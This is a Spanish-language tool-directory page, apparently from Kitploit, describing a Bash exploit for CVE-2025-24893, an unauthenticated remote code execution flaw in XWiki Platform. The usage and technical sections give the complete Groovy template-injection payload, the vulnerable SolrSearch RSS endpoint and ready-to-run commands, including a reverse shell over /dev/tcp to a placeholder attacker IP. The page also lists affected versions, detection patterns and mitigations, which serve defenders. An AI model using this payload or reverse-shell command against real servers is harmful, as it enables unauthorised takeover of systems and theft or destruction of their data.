Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — Exploit de Bash para CVE-2025-24893, RCE no autenticado en XWiki Platform, que utiliza inyección de plantillas en la macro SolrSearch para ejecutar comandos arbitrarios del sistema. | Kitploit
Herramientas/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

Exploit de Bash para CVE-2025-24893, RCE no autenticado en XWiki Platform, que utiliza inyección de plantillas en la macro SolrSearch para ejecutar comandos arbitrarios del sistema.

Ver Repositorio
35hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de RCE no autenticado en XWiki Platform

Descripción general

Este script es una implementación renovada en Bash de un exploit que apunta a las versiones de XWiki Platform afectadas por CVE-2025-24893. Aprovecha una vulnerabilidad crítica de ejecución remota de código no autenticado que permite a atacantes ejecutar código Groovy arbitrario mediante un fallo de inyección de plantillas en la macro SolrSearch.

Las implementaciones originales del exploit en Python fueron creadas por varios investigadores de seguridad y se adaptan aquí para usuarios de Bash con una ejecución simplificada y usabilidad mejorada.

Detalles de la vulnerabilidad

  • Descubridor: John Kwak (Trend Micro's Zero Day Initiative)
  • CVE: CVE-2025-24893
  • Puntuación CVSS: 9.8 (Crítica)
  • Referencias:
    • Aviso de seguridad oficial de XWiki (GHSA-rr6p-3pfg-562j)
    • Catálogo de vulnerabilidades explotadas conocidas de CISA
  • VulnCheck - XWiki CVE-2025-24893 explotado en la naturaleza
  • Blog de OffSec - RCE no autenticado en XWiki
  • Descripción: La vulnerabilidad se origina en una desinfección incorrecta de las entradas en la macro SolrSearch dentro de XWiki Platform. La macro no valida ni desinfecta adecuadamente la entrada proporcionada por el usuario en el parámetro text cuando se accede a través del endpoint RSS de medios, lo que permite a los atacantes inyectar código Groovy malicioso en la cadena de renderizado sin autenticación.
  • Versiones afectadas y parcheadas

    Versiones afectadas

    • XWiki Platform: 5.3-milestone-2 a 15.10.10
    • XWiki Platform: 16.0.0-rc-1 a 16.4.0

    Versiones parcheadas

    • XWiki 15.10.11 o posterior
    • XWiki 16.4.1 o posterior
    • XWiki 16.5.0RC1 o posterior

    Características

    • RCE no autenticado: Ejecuta comandos arbitrarios del sistema sin autenticación.
    • Omisión de token CSRF: Explota la inyección de plantillas sin necesidad de tokens CSRF.
    • Ejecución en segundo plano: Los comandos se ejecutan de forma asíncrona en el servidor objetivo.
    • Interfaz de línea de comandos simple: Script Bash fácil de usar con dependencias mínimas.

    Requisitos previos

    • Dependencias:
      • curl: Para enviar solicitudes HTTP.
      • jq: Para la codificación URL del payload.
      • Shell Bash.
    • Entorno probado: SO Linux con Bash.

    Uso

    Otorga los permisos de ejecución:

    root@kitploit:~
    chmod +x CVE-2025-24893
    

    Ejecuta el script con los argumentos requeridos:

    root@kitploit:~
    ./CVE-2025-24893 <url_objetivo> <comando>
    

    Parámetros

    ParámetroDescripción
    <url_objetivo>La URL de XWiki objetivo (ej., http://ejemplo.com o https://xwiki.ejemplo.org). El protocolo es opcional.
    <comando>El comando del sistema a ejecutar en el servidor objetivo.

    Ejemplo

    Verificar si el objetivo es vulnerable (ejecutar el comando id):

    root@kitploit:~
    ./CVE-2025-24893 http://xwiki-vulnerable.ejemplo.com "id"
    

    Obtener información del sistema:

    root@kitploit:~
    ./CVE-2025-24893 http://xwiki-vulnerable.ejemplo.com "uname -a"
    

    Crear un archivo de prueba:

    root@kitploit:~
    ./CVE-2025-24893 http://xwiki-vulnerable.ejemplo.com "touch /tmp/pwned"
    

    Shell inversa (reemplaza con tu IP y puerto):

    root@kitploit:~
    ./CVE-2025-24893 http://xwiki-vulnerable.ejemplo.com "bash -c 'bash -i >& /dev/tcp/TU_IP/TU_PUERTO 0>&1'"
    

    Flujo de trabajo del script

    1. Análisis de argumentos de línea de comandos:

      • Valida que tanto la URL objetivo como el comando estén presentes.
      • Normaliza la URL añadiendo http:// si no se especifica un protocolo.
    2. Construcción del payload:

      • Construye un payload de código Groovy que ejecuta el comando especificado usando .execute().
      • Envuelve el payload en la sintaxis de macro de XWiki: }}}{{async async=false}}{{groovy}}<código>{{/groovy}}{{/async}}
    3. Codificación URL:

      • Codifica el payload en URL usando jq para una transmisión HTTP adecuada.
    4. Explotación:

      • Envía una solicitud HTTP GET al endpoint vulnerable de SolrSearch: /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload_codificado>
      • El comando se ejecuta en segundo plano en el servidor objetivo.

    Detalles técnicos

    Mecanismo de explotación

    La cadena de explotación funciona de la siguiente manera:

    1. Inyección de plantillas: El atacante crea un payload malicioso que contiene código Groovy envuelto en sintaxis de macro de XWiki.
    2. Apuntar al endpoint: El payload se envía al endpoint RSS vulnerable de SolrSearch.
    3. Ejecución de código: El código Groovy inyectado se ejecuta del lado del servidor sin autenticación.
    4. Compromiso del sistema: El atacante obtiene ejecución de código arbitrario con los privilegios de la aplicación XWiki.

    Estructura del payload

    root@kitploit:~
    }}}{{async async=false}}{{groovy}}'<comando>'.execute();{{/groovy}}{{/async}}
    
    • }}} - Cierra cualquier contexto de macro existente
    • {{async async=false}} - Asegura una ejecución síncrona
    • {{groovy}}...{{/groovy}} - Envuelve el código Groovy malicioso
    • '<comando>'.execute(); - Ejecuta el comando del sistema especificado

    Prueba de concepto

    Configuración del entorno vulnerable

    Para fines de prueba, puedes configurar una instancia vulnerable de XWiki usando Docker:

    root@kitploit:~
    docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10
    

    Demostración de explotación

    root@kitploit:~
    # Espera a que XWiki se inicie (puede tardar 1-2 minutos)
    ./CVE-2025-24893 http://localhost:8080 "whoami"
    

    Impacto

    La explotación exitosa de esta vulnerabilidad permite a un atacante no autenticado:

    • Ejecutar comandos arbitrarios del sistema en el servidor
    • Leer, modificar o eliminar datos sensibles
    • Comprometer toda la instalación de XWiki
    • Moverse lateralmente a otros sistemas en la red
    • Implementar mineros de criptomonedas u otro malware
    • Establecer acceso persistente de puerta trasera

    Explotación en el mundo real

    Según CISA y múltiples proveedores de seguridad:

    • Explotación activa: CVE-2025-24893 se está explotando activamente en la naturaleza
    • Campañas de ataque: VulnCheck detectó cadenas de ataque de dos etapas que implementan mineros de criptomonedas
    • Catálogo KEV de CISA: Agregado al catálogo de Vulnerabilidades Explotadas Conocidas el 30 de octubre de 2025
    • Escaneo masivo: Escaneo masivo a nivel de Internet en busca de instancias vulnerables

    Detección y mitigación

    Detección

    Monitorea solicitudes sospechosas al endpoint SolrSearch:

    root@kitploit:~
    GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*
    

    Busca patrones que contengan:

    • {{groovy}}
    • {{async}}
    • .execute()
    • Variaciones codificadas en URL de lo anterior

    Indicadores de compromiso (IoCs)

    • Procesos inesperados generados por el usuario de la aplicación XWiki
    • Archivos nuevos en /tmp u otros directorios con permisos de escritura
    • Conexiones de red salientes a IPs desconocidas
    • Procesos de minería de criptomonedas (uso elevado de CPU)

    Mitigación

    1. Actualiza XWiki a una versión parcheada:

      • Versión 15.10.11 o posterior
      • Versión 16.4.1 o posterior
      • Versión 16.5.0RC1 o posterior
    2. Aplica soluciones temporales (si no es posible parchear de inmediato):

      • Restringe el acceso al endpoint SolrSearch mediante un Firewall de Aplicaciones Web (WAF)
      • Deshabilita la macro SolrSearch si no es necesaria
      • Implementa segmentación de red para limitar la exposición
    3. Monitorea en busca de compromiso:

      • Revisa los registros en busca de intentos de explotación
      • Verifica modificaciones no autorizadas de archivos
      • Escanea en busca de mineros de criptomonedas y puertas traseras

    Limitaciones

    • Los comandos se ejecutan en segundo plano; la salida puede no ser visible de inmediato.
    • La verificación de la ejecución del comando requiere métodos de canal lateral (ej., creación de archivos, conexiones de red).
    • Requiere que el objetivo tenga la macro SolrSearch habilitada (configuración predeterminada).

    Créditos

    • Descubridor de la vulnerabilidad: John Kwak (Trend Micro's Zero Day Initiative)
    • Autores originales del exploit en Python: Varios investigadores de seguridad
    • Script adaptado: Renovado por [0xdtc] Construido en BASH

    Descargo de responsabilidad

    Este script es únicamente con fines educativos. El uso no autorizado de esta herramienta contra sistemas que no posees o para los que no tienes permiso explícito de pruebas es ilegal y poco ético. Úsalo de manera responsable.

    Debes tener permiso explícito por escrito del propietario del sistema antes de realizar pruebas.

    El(los) autor(es) de esta herramienta no son responsables por el mal uso o daños causados por este script. Los usuarios son los únicos responsables de asegurarse de tener la autorización adecuada y cumplir con todas las leyes y regulaciones aplicables.

    Descargar herramienta